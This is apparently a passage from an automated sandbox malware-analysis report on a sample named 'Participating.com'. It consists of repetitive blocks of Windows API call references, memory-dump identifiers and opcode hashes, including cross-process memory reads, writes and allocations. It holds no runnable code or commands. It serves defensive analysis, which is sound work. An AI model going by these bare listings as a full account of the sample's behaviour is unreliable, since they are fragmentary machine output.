                                                                                                                                                                                                                                                                  • Opcode ID: e2fdaef959d32c7e13ca4608d339243e070767d14030a48975c71a34e01818c2
                                                                                                                                                                                                                                                                  • Instruction ID: 071a82cecbe6f52151d302dd17d20c1327567b46367b7b198159b9c8ac256234
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2fdaef959d32c7e13ca4608d339243e070767d14030a48975c71a34e01818c2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E601A930500308ABEB346F20DD4EB9A7B79FF05705F040559B18BA14E1EBF1EA84CB61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DAD2
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DAE4
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DAF6
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DB08
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DB1A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: b68e703987861846a6b1242604eee5d222ab7834b10e70da10bd48df30d134a6
                                                                                                                                                                                                                                                                  • Instruction ID: 1742cb6f796a587a4855a24ff6b516809c64b0453029b9b41467a2269c231641
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b68e703987861846a6b1242604eee5d222ab7834b10e70da10bd48df30d134a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94F0E772549314BB8624EB68F982CEA77EFEE057107A90805F00AD7A01CF25FCC08AB4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1262E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12640
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12653
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12664
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12675
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: a5efd0be2161b1d2aa9c36c05aa7bbfecdff4ee659e14d2f0b3e5f1c8d9547ef
                                                                                                                                                                                                                                                                  • Instruction ID: 977ee54d888cc62f11ae348cf40c6ad009ccf9d8f5df62c13ddfccfb3aab5cc3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5efd0be2161b1d2aa9c36c05aa7bbfecdff4ee659e14d2f0b3e5f1c8d9547ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0BDB6801310EB8605AF64FC528F83665FB297613850706F415D6375CF364A61EEF4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __freea$_free
                                                                                                                                                                                                                                                                  • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                  • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                  • Opcode ID: fed72e0dceb482a122773b5f1ee983714cade51781d4b1eb41e6ceaa1bc7b14a
                                                                                                                                                                                                                                                                  • Instruction ID: e21ae95dce5c89f7b3eac2e58548c1efcd6ca374d8b33406c378ef88e18851aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fed72e0dceb482a122773b5f1ee983714cade51781d4b1eb41e6ceaa1bc7b14a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D1F479910206FADB249FA8E8457FAB7B1FF05700F2C415AE6429B294DB359DC0CBB1
APIs
  • Part of subcall function 00D4BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D42B1D,?,?,00000034,00000800,?,00000034), ref: 00D4BDF4
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D430AD
  • Part of subcall function 00D4BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D42B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00D4BDBF
  • Part of subcall function 00D4BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00D4BD1C
  • Part of subcall function 00D4BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00D4BD2C
  • Part of subcall function 00D4BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00D4BD42
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D4311A
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D43167
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 14c615f81ef475a4b545b302ad26c23e5c8821a2a3d420bc6b9047df42854465
• Instruction ID: db494955fd2b5d9a02360a235094c1835f4cdc51260229f5ba859ddd5a79894b
• Opcode Fuzzy Hash: 14c615f81ef475a4b545b302ad26c23e5c8821a2a3d420bc6b9047df42854465
• Instruction Fuzzy Hash: 4A411B72900218AFDB10DBA8CD85AEEBBB8EF55710F144095FA45B7181DB70AF85CB60
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\615578\Participating.com,00000104), ref: 00D11AD9
• _free.LIBCMT ref: 00D11BA4
• _free.LIBCMT ref: 00D11BAE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\615578\Participating.com
• API String ID: 2506810119-3429811749
• Opcode ID: 3c7c3963f4963d62ca7077239b6520324569bc1b4bc3d7abf72ea6a66b3a0ced
• Instruction ID: a51633e1160a700590c8365371f004701b6c2c5b1edc476b18ef42338f50777f
• Opcode Fuzzy Hash: 3c7c3963f4963d62ca7077239b6520324569bc1b4bc3d7abf72ea6a66b3a0ced
• Instruction Fuzzy Hash: 1D318375A04218FFCB21DB99ED81DEEBBBCEF85710B1441A6E504D7211EA708E81CBB4
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D4CBB1
• DeleteMenu.USER32(?,00000007,00000000), ref: 00D4CBF7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00DB29C0,01736BD0), ref: 00D4CC40
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 3eb975a36f9852e0cb0c421d054a663e3e3fba5c4d861f329ee54b7c0b2a226c
• Instruction ID: 8d4a96570bc2fad8fed9b7f8aa0e50f9b339671bd532158f54372cbd75fe687a
• Opcode Fuzzy Hash: 3eb975a36f9852e0cb0c421d054a663e3e3fba5c4d861f329ee54b7c0b2a226c
• Instruction Fuzzy Hash: C141BF312163429FD760DF24D885B2ABBE8EF85714F184A1DF5A997291DB30E904CB72
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D7DCD0,00000000,?,?,?,?), ref: 00D74F48
• GetWindowLongW.USER32 ref: 00D74F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D74F75
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 60f6f7bd0d8cedd60f36c187a4143f07b7dc53374478f9e2e3ccafe7d4313735
• Instruction ID: 38ffce19211be4e386be1ba2e4614865932e32d8f1e3a6487adb5d64893400d6
• Opcode Fuzzy Hash: 60f6f7bd0d8cedd60f36c187a4143f07b7dc53374478f9e2e3ccafe7d4313735
• Instruction Fuzzy Hash: 3C318F31204205AFDB228E78DC45BEAB7A9EF49334F248715F979E21E0E770EC509B60
APIs
  • Part of subcall function 00D63DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00D63AD4,?,?), ref: 00D63DD5
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D63AD7
• _wcslen.LIBCMT ref: 00D63AF8
• htons.WSOCK32(00000000,?,?,00000000), ref: 00D63B63
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D749DC
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D749F0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00D74A14
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00D751A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00D751B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D751B8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D742DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D742EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D74312
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00D5544D
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00D554A1
• SetErrorMode.KERNEL32(00000000,?,?,00D7DCD0), ref: 00D55515
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                  • Opcode ID: c5436150bf8615320866d6bec086473a4c56c23e78e37a94a0ff5207563d5627
                                                                                                                                                                                                                                                                  • Instruction ID: 1b50ca16c18c68f2df31c5012b0375acbe1eb95164438e41b1d8544aaa7be8bf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5436150bf8615320866d6bec086473a4c56c23e78e37a94a0ff5207563d5627
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE315074A00209AFDB11DF54C885EAA77B9EF04305F1440A8F809DB362DB71EE45DB71
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D74CED
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D74D02
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D74D0F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                  • Opcode ID: 723f67f2947c82e87c10d87f1c19ad123759131b90749d5e573e843dfd1e349d
                                                                                                                                                                                                                                                                  • Instruction ID: 3d3e239ef7414896081a37ec7276c0e496a917e999894c769174bae2885ac678
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 723f67f2947c82e87c10d87f1c19ad123759131b90749d5e573e843dfd1e349d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1110671240348BEEF225F65CC06FAB37ACEF85B64F114514FA59E21A0E671DC619B30
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D43712
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D43723
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: GetCurrentThreadId.KERNEL32 ref: 00D4372A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D43731
                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00D438C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4373B: GetParent.USER32(00000000), ref: 00D43746
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00D4390F
                                                                                                                                                                                                                                                                  • EnumChildWindows.USER32(?,00D43987), ref: 00D43937
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                                                                                                                  • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                  • Opcode ID: 9b742cc79734786edb93aebb12da29b704b1e8c6b3e88a114a98dc9db08a5762
                                                                                                                                                                                                                                                                  • Instruction ID: 423ff4573e17f1cf6f508a0b5e1063bea0f603dfb5b8fbde40f1eea79cd6c08c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b742cc79734786edb93aebb12da29b704b1e8c6b3e88a114a98dc9db08a5762
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4911E471600209ABDF01BF788C85AED77AAEF94300F048069BD4D9B292DF719949DB30
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D76360
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D7638D
                                                                                                                                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00D7639C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: e3b3c86aed0169f33822e34aa248acd13a49d1a2f862c1c80ee1157fced5c0ca
                                                                                                                                                                                                                                                                  • Instruction ID: 977fa2046b383f23b7c0e562dcebf084810c5520a76797976ce8b919842d1b0c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b3c86aed0169f33822e34aa248acd13a49d1a2f862c1c80ee1157fced5c0ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92015731500218AFDB219F11DC84BAABBB5FF45351F18C099F84ED6290EB308A85EF32
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00D3E797
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 00D3E7BD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                  • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                  • Opcode ID: 01e9207c28e20c7e9a1b526ad0004208f62d4429452169a6cd716cfa6db29334
                                                                                                                                                                                                                                                                  • Instruction ID: 85e6f16c8e4a7d9991d147814b05fd1ae94d83468e333b21954c5b773aa08910
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01e9207c28e20c7e9a1b526ad0004208f62d4429452169a6cd716cfa6db29334
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E092B19027659FE7B65A204C85FB933256F20B41F590968ED46F63D0EB30CD8886B5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
